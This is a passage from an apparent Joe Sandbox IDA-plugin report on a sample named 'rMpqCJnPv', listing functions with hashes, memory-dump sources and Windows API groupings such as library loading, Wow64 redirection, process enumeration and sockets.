                                                                                                                    • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                                                    • Instruction ID: 399d5467b261eddb417761bd9e82960dc7c9d431bd8865b919fcc982987d5109
                                                                                                                    • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                                                                    • Instruction Fuzzy Hash: 3F416D326086C18BE730DF19E444B9AB7A1FB99790F504235EF9943AA8DF3CD4858F40
                                                                                                                    Function 00007FF7BB88B798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 1752125012-2298589950
                                                                                                                    • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                                                    • Instruction ID: 3dea9a26df81c90f979ac678bf62ed12e8be30a74eba79ea016a35320c9ebe3b
                                                                                                                    • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                                                                                    • Instruction Fuzzy Hash: 6C31B132A18B8586EB20DB19E4443AAB360FBDAB95F904136DF8D43B69CF3CD454CB50
                                                                                                                    Function 00007FF7BB864DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                    • String ID: %lu
                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                    • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                                                    • Instruction ID: c43fb19e105d95d5c54646e6f577d3d11baf2b706bc3802af7c7a80c71ef577a
                                                                                                                    • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                                                                    • Instruction Fuzzy Hash: CB318F32608B8685DA10EB1EE4401ADB7A5FB9ABC0F804036EF8D43B79CF38E565C750
                                                                                                                    Function 00007FF7BB88B104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    • API String ID: 1025951953-1010561917
                                                                                                                    • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                                                    • Instruction ID: c0e9415b77f1f09bb001ac1218222a8d18853688b47e1c4d7a2a29059d9e56c5
                                                                                                                    • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                                                                    • Instruction Fuzzy Hash: 43313A3261878187E760DF19E448B5AB7A1FB99B90F505235EB9803B68CF3CE851CB54
                                                                                                                    Function 00007FF7BB84F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                                                                    • String ID: %s%d
                                                                                                                    • API String ID: 2330185562-1110647743
                                                                                                                    • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                                    • Instruction ID: c4e024778f159e09c42289080ab1bd08ec907a35b2540f5370d0ca5bdab53f6b
                                                                                                                    • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                                                                    • Instruction Fuzzy Hash: 70218031608B8295EA24EB2DE4542FAA365BF5ABC0F844035DF9D07779DE2CE115C7A0
                                                                                                                    Function 00007FF7BB87AF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB842DD1), ref: 00007FF7BB87AF37
                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB842DD1), ref: 00007FF7BB87AF4F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-1816364905
                                                                                                                    • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                                                    • Instruction ID: 9c45ac5652aacddc477e89805c9735b69684d49a8cf24196e0869d5dcdc98d67
                                                                                                                    • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                                                                    • Instruction Fuzzy Hash: 4CF0FE61905B0581EF14EB6DD444364A3E4FB29B49FC40435DE5D01378EF7DE5A8C390
                                                                                                                    Function 00007FF7BB877634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                    • Instruction ID: 3f41a357fe8e02719e41e4a0dbfb9c722c2491a4c0a016933e5b7bdad4f13161
                                                                                                                    • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                    • Instruction Fuzzy Hash: 6FE0C925905B0691EF14AB6DE81836863A0BB2AB48FC41435DE5D45368EF7CE5B8C390
                                                                                                                    Function 00007FF7BB8810C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                    • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                                                    • Instruction ID: 71077238843454e888a8e1fa821813a3836165bd28e1329d7b1566aaa34d9638
                                                                                                                    • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                                                                    • Instruction Fuzzy Hash: 76E06D25A05B02C2EF15AB2CE8183A8A3A0FB2AB05FC41435DE1C41368EF7DE5B5C390
                                                                                                                    Function 00007FF7BB7E6D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                    • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                                                    • Instruction ID: a6c0f944d667a216ad6d8d2896b25cb0cf076949c653b22e00b84d14864c3a3c
                                                                                                                    • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                                                                    • Instruction Fuzzy Hash: 4FE0C921905B0681EF15EB6DE4183A863A4BB2AB48FC41435CE5D4537CEF7CE5A49290
                                                                                                                    Function 00007FF7BB7E6D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                    • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                                                    • Instruction ID: 39588eb8d0d85811551e98dcdf9e2cc1e617e7abe6aee822525c65d3e9373f41
                                                                                                                    • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                                                                    • Instruction Fuzzy Hash: 32E0C921905F0681EF15EB6DE4183A863A4BB2AB48FC41835DE5D45378EFBCE5A4D390
                                                                                                                    Function 00007FF7BB84B7E4 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                                    • Instruction ID: ecf54955101c920a3d8f6565b3ab17314e583bfd56e654dcff15cff56fa372e7
                                                                                                                    • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                                                                    • Instruction Fuzzy Hash: 0FD10566B04B568AEB14DF2EC4502AC77B0FB99F88B514422DF4D47B68DF39D864C3A0
                                                                                                                    Function 00007FF7BB8779D8 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                                    • Instruction ID: 93426fdd253c5a408d50e7d0707395cdf903075c98252e3b720126bf64218efd
                                                                                                                    • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                                                                                    • Instruction Fuzzy Hash: 02D14B66B04B419AEB10EBA9D4801EC73B5FB69788B804436DF0D57B79DF38E529C390
                                                                                                                    Function 00007FF7BB87EB34 Relevance: 6.2, APIs: 4, Instructions: 156processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2000298826-0
                                                                                                                    • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                                                    • Instruction ID: 4630adfbd510b196dec654dc48319743c460f6bd5b64191ad7feee80dbd0ea69
                                                                                                                    • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                                                                    • Instruction Fuzzy Hash: 61719F32A18B8186E700EB69D4043AEA7A4FB99B88F804132EF4D07779DF7CE545C750
                                                                                                                    Function 00007FF7BB88D88C Relevance: 6.1, APIs: 4, Instructions: 134windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMessageMoveRectScreenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1249313431-0
                                                                                                                    • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                                                    • Instruction ID: 16117144f29ed501202090ee8db0a5d0ed51fc129928bf119a1f970c2fb919a8
                                                                                                                    • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                                                                    • Instruction Fuzzy Hash: 1851F732A046428AEB10DF2DD8845BD7762F755B58F90413ADF1D937A8CF39E851C3A0
                                                                                                                    Function 00007FF7BB85BAB8 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                                                    • Instruction ID: f079b4dcf492d89960b50fbd02ef263e92ebee2f084e132225f36fe51ae73b37
                                                                                                                    • Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
                                                                                                                    • Instruction Fuzzy Hash: 6A51DE22B05A0185EF50AF6EC9805ACA3B5BB26B94B944131DF4D537BCDF3CD952C360
                                                                                                                    Function 00007FF7BB8743C8 Relevance: 6.1, APIs: 4, Instructions: 126networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1881357543-0
                                                                                                                    • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                                                    • Instruction ID: b786cbc43b4a550270b36efb214332aa8f29a3fa126265b651434aefac715436
                                                                                                                    • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                                                                    • Instruction Fuzzy Hash: 2C41A12171868285DB10AF6EE410669A790BF9AFE4F844135DF5D17BBACF3CE0118750
                                                                                                                    Function 00007FF7BB865DA4 Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
